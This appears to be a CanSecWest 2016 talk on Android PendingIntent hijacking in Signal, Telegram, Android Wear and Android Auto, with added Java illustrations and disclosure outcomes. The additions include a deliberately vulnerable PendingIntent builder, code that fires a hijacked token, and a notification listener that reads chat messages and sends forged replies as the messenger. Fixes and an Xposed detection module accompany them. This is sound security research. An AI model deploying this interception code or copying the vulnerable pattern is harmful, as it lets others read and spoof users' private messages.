Having fun with secure messengers and Android Wear (and Android Auto)
Artem Chaykin
Positive Technologies
CanSecWest’16
Who am I?
• Russian hacker / Putin’s agent
• Mobile application security team lead
• SCADA Strangelove Team
• RDot.Org team member

Android IPC basics
• Private memory for each process
• Data is passed through a kernel driver, Binder
• Intent-based

Intents
• An Intent is an object (a message describing an operation and, optionally, its target)
• App1 can send intents to exported components of App2
[Diagram: an Intent carries a package name, a component name, an action and data]
PendingIntent
[Diagram: a PendingIntent wraps an Intent together with the creating app’s identity and permissions]
• getActivity()
• getService()
• getBroadcast()

PendingIntent: where it is used
• AlarmManager
• NotificationManager
• Identity confirmation (the receiver can ask the token who created it via getCreatorPackage()/getCreatorUid())
Example 0x2 – PendingIntent hijacking
• 3rd party push services
• Identity confirmation
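The slide only names the pattern, so here is an added illustration of what "PendingIntent hijacking" means in code. This is not code from the talk or from any of the apps it mentions; `ReplyService`, the action string and the example URL are hypothetical, and `FLAG_IMMUTABLE` requires compiling against API 23 or later:

```java
// Added illustration, not code from the talk or from any named app.
import android.app.IntentService;
import android.app.PendingIntent;
import android.content.Context;
import android.content.Intent;
import android.net.Uri;
import android.os.Build;

public class PendingIntentTokens {

    // VULNERABLE: the base Intent has neither component nor action. Whoever
    // holds this token can supply them at send() time, and the framework
    // delivers the filled-in Intent as if the creating app had started it,
    // i.e. with the creating app's identity and permissions.
    public static PendingIntent buildHijackable(Context ctx) {
        Intent base = new Intent();
        return PendingIntent.getActivity(ctx, 0, base, PendingIntent.FLAG_UPDATE_CURRENT);
    }

    // Holder side (a third-party push SDK, or any app the token was handed to).
    // Intent.fillIn() semantics apply: action, data, categories and package are
    // copied where the base left them unset and extras are always merged; the
    // component can only be filled in if the creator passed
    // Intent.FILL_IN_COMPONENT among the PendingIntent flags.
    public static void fireAsCreator(Context holderCtx, PendingIntent token)
            throws PendingIntent.CanceledException {
        Intent chosen = new Intent(Intent.ACTION_VIEW, Uri.parse("https://example.invalid/")) // constructed target
                .putExtra("holder_extra", "controlled");
        token.send(holderCtx, 0, chosen); // started in the creator's name
    }

    // FIXED: explicit target so fillIn() cannot redirect it, plus FLAG_IMMUTABLE
    // (API 23+) so send() ignores the Intent supplied by the holder entirely.
    public static PendingIntent buildSafe(Context ctx, String chatId) {
        Intent base = new Intent(ctx, ReplyService.class)          // hypothetical service of the creator
                .setAction("com.example.creator.ACTION_REPLY")
                .putExtra("chat_id", chatId);
        int flags = PendingIntent.FLAG_UPDATE_CURRENT;
        if (Build.VERSION.SDK_INT >= Build.VERSION_CODES.M) {
            flags |= PendingIntent.FLAG_IMMUTABLE;
        }
        return PendingIntent.getService(ctx, chatId.hashCode(), base, flags);
    }

    // Identity confirmation: the receiver of a token can check who created it
    // (API 17+) before trusting anything the token carries.
    public static boolean createdBy(PendingIntent token, String expectedPackage) {
        return expectedPackage.equals(token.getCreatorPackage());
    }

    // Hypothetical explicit target used by buildSafe(); it only trusts the
    // chat_id extra because the token that delivers it is immutable.
    public static class ReplyService extends IntentService {
        public ReplyService() { super("ReplyService"); }
        @Override protected void onHandleIntent(Intent intent) {
            String chatId = intent == null ? null : intent.getStringExtra("chat_id");
            if (chatId == null) return;
            // ... send the reply for chatId ...
        }
    }
}
```

Note that on devices below API 23 there is no `FLAG_IMMUTABLE`, so an explicit component in the base Intent is the only protection: it stops redirection, but extras supplied by the holder are still merged in and must be validated by the target.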
Victims:
Android Wear & Android Auto
• The RemoteInput class is based on PendingIntent
• Voice reply
Example 0x3: Spam
Victim:
• Bug:
• Exploit:
• Result:
• Victims:
Example 0x3: Intercepting
Victim:
• Bug:
• Exploit:
• Android Auto victims:
• Android Wear victims:
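The bug, exploit and result slides above are screenshots that did not survive extraction, so here is an added illustration of the mechanism the "RemoteInput is based on PendingIntent" slide refers to, covering both the spam and the interception cases. It is not code from the talk or from any messenger: the messenger side builds a Wear voice-reply action with the framework classes (`android.app.RemoteInput`, API 20+), and the listener side shows what any app holding notification access can do with that action through public API. `ReplyReceiver`, the key, action and text strings are hypothetical:

```java
// Added illustration, not code from the talk or from any messenger.
import android.app.Notification;
import android.app.PendingIntent;
import android.app.RemoteInput;
import android.content.BroadcastReceiver;
import android.content.Context;
import android.content.Intent;
import android.os.Bundle;
import android.service.notification.NotificationListenerService;
import android.service.notification.StatusBarNotification;
import java.util.ArrayList;
import java.util.List;

public class VoiceReplyDemo {
    static final String KEY_REPLY = "key_reply_text";   // hypothetical result key
    static final String EXTRA_CHAT = "chat_id";

    // Messenger side: a notification with a Wear voice-reply action. The reply
    // text comes back as an extra on the action's PendingIntent, so whoever can
    // call send() on that PendingIntent can also choose the text.
    public static Notification buildChatNotification(Context ctx, String chatId, String text) {
        Intent reply = new Intent(ctx, ReplyReceiver.class)
                .setAction("com.example.messenger.REPLY")
                .putExtra(EXTRA_CHAT, chatId);
        PendingIntent replyPi = PendingIntent.getBroadcast(
                ctx, chatId.hashCode(), reply, PendingIntent.FLAG_UPDATE_CURRENT);
        RemoteInput input = new RemoteInput.Builder(KEY_REPLY).setLabel("Reply").build();
        Notification.Action action = new Notification.Action.Builder(
                android.R.drawable.ic_menu_send, "Reply", replyPi)
                .addRemoteInput(input)
                .build();
        return new Notification.Builder(ctx)
                .setSmallIcon(android.R.drawable.sym_action_chat)
                .setContentTitle(chatId)
                .setContentText(text)
                .extend(new Notification.WearableExtender().addAction(action))
                .build();
    }

    // Messenger side: the component that receives the reply. A typical app
    // sends `msg` to `chat` right here, because it assumes the text came from
    // the Wear/Auto reply UI.
    public static class ReplyReceiver extends BroadcastReceiver {
        @Override public void onReceive(Context ctx, Intent intent) {
            Bundle results = RemoteInput.getResultsFromIntent(intent);
            if (results == null) return;
            CharSequence msg = results.getCharSequence(KEY_REPLY);
            String chat = intent.getStringExtra(EXTRA_CHAT);
            // ... messenger-specific send(chat, msg) ...
        }
    }

    // Any app granted notification access (a Wear/Auto companion, but equally a
    // malicious app) can read the message (interception) and fire the reply
    // action with text of its own choosing (spam), using only public API.
    public static class ReplyFirer extends NotificationListenerService {
        @Override public void onNotificationPosted(StatusBarNotification sbn) {
            Notification n = sbn.getNotification();
            CharSequence intercepted = n.extras.getCharSequence(Notification.EXTRA_TEXT); // message body
            List<Notification.Action> actions = new ArrayList<>();
            if (n.actions != null) for (Notification.Action a : n.actions) actions.add(a);
            actions.addAll(new Notification.WearableExtender(n).getActions()); // Wear-only actions
            for (Notification.Action a : actions) {
                RemoteInput[] inputs = a.getRemoteInputs();
                if (inputs == null || a.actionIntent == null) continue;
                Bundle forged = new Bundle();
                for (RemoteInput ri : inputs) {
                    forged.putCharSequence(ri.getResultKey(), "constructed reply text"); // constructed input
                }
                Intent carrier = new Intent();
                RemoteInput.addResultsToIntent(inputs, carrier, forged); // extras are merged by send()
                try {
                    a.actionIntent.send(this, 0, carrier); // delivered with the messenger's identity
                } catch (PendingIntent.CanceledException ignored) {
                }
            }
        }
    }
}
```

The point of the example is that nothing distinguishes the system's reply UI from the listener above: both are just callers of `PendingIntent.send()` with a `RemoteInput` results bundle, so the messenger's `ReplyReceiver` has no signal on the API levels of the time for where the text originated. Whether the Wear/Auto attack surface is exposed is therefore decided by which apps hold notification access, not by anything the messenger checks.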
Detecting with Xposed module
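The deck names an Xposed module but does not include its code, so the following is an added, hypothetical module rather than the author's. It hooks the three `PendingIntent` factory methods in every app process and logs, with a stack trace to the creation site, each mutable token whose base Intent is implicit (no component), which is the pattern the hijacking example relies on:

```java
// Added illustration, not the module from the talk. Names are hypothetical.
import android.app.PendingIntent;
import android.content.Context;
import android.content.Intent;
import de.robv.android.xposed.IXposedHookLoadPackage;
import de.robv.android.xposed.XC_MethodHook;
import de.robv.android.xposed.XposedBridge;
import de.robv.android.xposed.XposedHelpers;
import de.robv.android.xposed.callbacks.XC_LoadPackage.LoadPackageParam;

public class PendingIntentAudit implements IXposedHookLoadPackage {
    // PendingIntent.FLAG_IMMUTABLE is 1 << 26 (API 23); spelled out so the
    // module also compiles against older SDKs and can report its absence.
    private static final int FLAG_IMMUTABLE = 1 << 26;

    @Override
    public void handleLoadPackage(final LoadPackageParam lpparam) throws Throwable {
        XC_MethodHook audit = new XC_MethodHook() {
            @Override
            protected void afterHookedMethod(MethodHookParam param) {
                Intent base = (Intent) param.args[2];
                int flags = (Integer) param.args[3];
                boolean implicit = base == null || base.getComponent() == null;
                boolean mutable = (flags & FLAG_IMMUTABLE) == 0;
                if (implicit && mutable) {
                    XposedBridge.log("[pi-audit] " + lpparam.packageName
                            + ": mutable PendingIntent." + param.method.getName()
                            + " with implicit base Intent"
                            + (base != null && base.getAction() == null ? " (no action either)" : "")
                            + ", flags=0x" + Integer.toHexString(flags));
                    XposedBridge.log(new Throwable("creation site")); // who built it
                }
            }
        };
        // Static factories: getActivity/getService/getBroadcast(Context, int, Intent, int)
        for (String factory : new String[] {"getActivity", "getService", "getBroadcast"}) {
            XposedHelpers.findAndHookMethod(PendingIntent.class, factory,
                    Context.class, int.class, Intent.class, int.class, audit);
        }
    }
}
```

Run it with the package list you want to audit (messengers, push SDKs, companion apps) and grep the Xposed log for `[pi-audit]`; an entry whose base Intent has no action at all is the strongest signal, since the holder of that token controls both target and payload.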
Fixes
• Signal – emailed Moxie – fixed same day – got “thanks”
• Telegram – emailed security@ – partial fix after ~45 days – still no “thanks”